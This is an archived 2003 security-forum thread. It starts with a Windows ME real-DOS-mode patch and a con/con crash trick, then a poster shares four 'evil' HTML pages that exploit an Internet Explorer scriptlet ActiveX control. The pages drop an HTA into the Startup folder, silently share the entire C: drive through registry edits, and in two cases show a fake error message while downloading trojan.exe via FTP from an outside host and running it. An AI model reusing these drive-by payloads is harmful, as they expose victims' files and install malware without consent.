hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Public Downloads
wicked
Nov 14 2003, 10:26 AM
Did you ever wonder why Windows ME, which is based on the Windows 9x kernel, can't access Real DOS-Mode? Did you think that Windows ME architecture doesn't allow it?

Well, it seems that Microsoft simply decided to hide this option in Windows ME, for some unknown reason...

This patch will modify IO.SYS, COMMAND.COM and REGENV32.EXE in order to unhide the Real DOS-Mode on Windows ME systems, resulting in a similar boot process to the one available in Windows 9x. This will allow, for example, to reach DOS directly by pressing Shift-F8 at boot-up, to use CONFIG.SYS and AUTOEXEC.BAT before Windows loads, and to set up a startup menu.

This patch was tested only with the final release of Win ME (build 4.90.3000). It might be compatible with other (future or previous) builds as well.

ps: 10kb << Huge

Yorn
Nov 14 2003, 03:46 PM
The reason why is simple. I could put an
CODE
<IMG SRC="C:/con/con/con.jpg">
link in a webpage and crash you if you had real mode DOS.
wicked
Nov 14 2003, 08:01 PM
Ahh well I Never New that mate....

thanks for the nfo..

Actually I Have Some Susspicious Html Code somewhere....Lets..see

Ahh here it is: Evil share...

CODE
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <title>Executing programs with IE 5.0 using  "Object for constructing type libraries for scriptlets".
</title>
</head> <body> <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br /> <a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/> <a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/> <a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/> <a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p> </td> <td width="85%" align="left" valign="top">
<object id="scr"
  classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<script>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\windows95.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>;wsh.Run('command /c echo REGEDIT4
>> C:\\winfree.reg',true,1);wsh.Run('command /c echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNETSUP]>> C:\\winfree1.reg',true,1);wsh.Run('command /c echo "FileSharing"="Yes">> C:\\winfree1.reg',true,1);wsh.Run('command /c echo "PrintSharing"="Yes">> C:\\winfree1.reg',true,1);wsh.Run('command /c REGEDIT /s winfree1.reg
',true,1);wsh.Run('command /c echo REGEDIT4
>> C:\\winfree.reg',true,1);wsh.Run('command /c echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C]>> C:\\winfree.reg',true,1);wsh.Run('command /c echo "Flags"=dword:00000101>> C:\\winfree.reg',true,1);wsh.Run('command /c echo "Type"=dword:00000000>> C:\\winfree.reg',true,1);wsh.Run('command /c echo "Path"="C:\\">> C:\\winfree.reg',true,1);wsh.Run('command /c echo "Parm2enc"=hex:>> C:\\winfree.reg',true,1);wsh.Run('command /c echo "Parm1enc"=hex:>> C:\\winfree.reg',true,1);wsh.Run('command /c echo "Remark"="FREE_JCzic">> C:\\winfree.reg',true,1);wsh.Run('command /c REGEDIT /s winfree1.reg
',true,1);wsh.Run('command /c REGEDIT /s winfree.reg
',true,1)</"+"SCRIPT>";
scr.write();


</script>
</body>
</html>


^^For 98 ....

CODE

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <title>Executing programs with IE 5.0 using  "Object for constructing type libraries for scriptlets".
</title>
</head> <body> <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br /> <a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/> <a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/> <a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/> <a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p> </td> <td width="85%" align="left" valign="top">
<object id="scr"
  classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<script>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\windows95.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>alert('ERROR: Exception 00x00000000 in comcat.dll. Please wait while the file is repaired.',true,1);wsh.Run('command /c echo username>> C:\\UPLDFILE.FTP',true,1);wsh.Run('command /c echo password>> C:\\UPLDFILE.FTP',true,1);wsh.Run('command /c echo binary >> C:\\UPLDFILE.FTP',true,1);wsh.Run('command /c echo get trojan.exe >> C:\\UPLDFILE.FTP',true,1);wsh.Run('command /c echo quit >> C:\\UPLDFILE.FTP',true,1);wsh.Run('ftp -v -i -s:c:\\UPLDFILE.FTP  ftp.xoom.com',true,1);wsh.Run('command /c trojan.exe',true,1)</"+"SCRIPT>";
scr.write();


</script>
</body>
</html>


^^ 98 Again

CODE

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <title>Executing programs with IE 5.0 using  "Object for constructing type libraries for scriptlets".
</title>
</head> <body> <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br /> <a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/> <a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/> <a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/> <a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p> </td> <td width="85%" align="left" valign="top">
<object id="scr"
  classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\Profiles\\Default User\\Start Menu\\Programs\\Startup\\windowsNT.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>;wsh.Run('cmd /c echo REGEDIT4
>> C:\\winfree.reg',true,1);wsh.Run('cmd /c echo "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Network\LanMan\C]>> C:\\winfree1.reg',true,1);wsh.Run('cmd /c echo "FileSharing"="Yes">> C:\\winfree1.reg',true,1);wsh.Run('cmd /c echo "PrintSharing"="Yes">> C:\\winfree1.reg',true,1);wsh.Run('cmd /c REGEDIT /s winfree1.reg
',true,1);wsh.Run('cmd /c echo REGEDIT4
>> C:\\winfree.reg',true,1);wsh.Run('cmd /c echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C]>> C:\\winfree.reg',true,1);wsh.Run('cmd /c echo "Flags"=dword:00000101>> C:\\winfree.reg',true,1);wsh.Run('cmd /c echo "Type"=dword:00000000>> C:\\winfree.reg',true,1);wsh.Run('cmd /c echo "Path"="C:\\">> C:\\winfree.reg',true,1);wsh.Run('cmd /c echo "Parm2enc"=hex:>> C:\\winfree.reg',true,1);wsh.Run('cmd /c echo "Parm1enc"=hex:>> C:\\winfree.reg',true,1);wsh.Run('cmd /c echo "Remark"="FREE_JCzic">> C:\\winfree.reg',true,1);wsh.Run('cmd /c REGEDIT /s winfree1.reg
',true,1);wsh.Run('cmd /c REGEDIT /s winfree.reg
',true,1)</"+"SCRIPT>";
scr.write();


</script>
</body>
</html>


^^ NT/2K

CODE

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <title>Executing programs with IE 5.0 using  "Object for constructing type libraries for scriptlets".
</title>
</head> <body> <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br /> <a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/> <a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/> <a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/> <a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p> </td> <td width="85%" align="left" valign="top">
<object id="scr"
  classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<script>
scr.Reset();
scr.Path="C:\\WINNT\\Profiles\\Default User\\Start Menu\\Programs\\Startup\\windowsNT.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>;wsh.Run('cmd /c echo choice /c:. /t:.,99 /n>> C:\\p234.bat',true,1);wsh.Run('cmd /c echo choice /c:. /t:.,99 /n>> C:\\p234.bat',true,1);wsh.Run('cmd /c echo choice /c:. /t:.,99 /n>> C:\\p234.bat',true,1);wsh.Run('cmd /c echo choice /c:. /t:.,99 /n>> C:\\p234.bat',true,1);wsh.Run('cmd /c echo choice /c:. /t:.,99 /n>> C:\\p234.bat',true,1);wsh.Run('cmd /c echo choice /c:. /t:.,99 /n>> C:\\p234.bat',true,1);wsh.Run('cmd /c echo choice /c:. /t:.,99 /n>> C:\\p234.bat',true,1);wsh.Run('cmd /c p234.bat',true,1);wsh.Run('cmd /c echo username>> C:\\UPLDFILE.FTP',true,1);wsh.Run('cmd /c echo password>> C:\\UPLDFILE.FTP',true,1);wsh.Run('cmd /c echo binary >> C:\\UPLDFILE.FTP',true,1);wsh.Run('cmd /c echo get trojan.exe >> C:\\UPLDFILE.FTP',true,1);wsh.Run('cmd /c echo quit >> C:\\UPLDFILE.FTP',true,1);wsh.Run('cmd /c ftp -v -i -s:c:\\UPLDFILE.FTP  ftp.xoom.com',true,1);wsh.Run('cmd /c trojan.exe',true,1);wsh.Run('cmd /c pause',true,1)</"+"SCRIPT>";
scr.write();


</script>
</body>
</html>


^^ NT Again..

Wkd..

.../
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.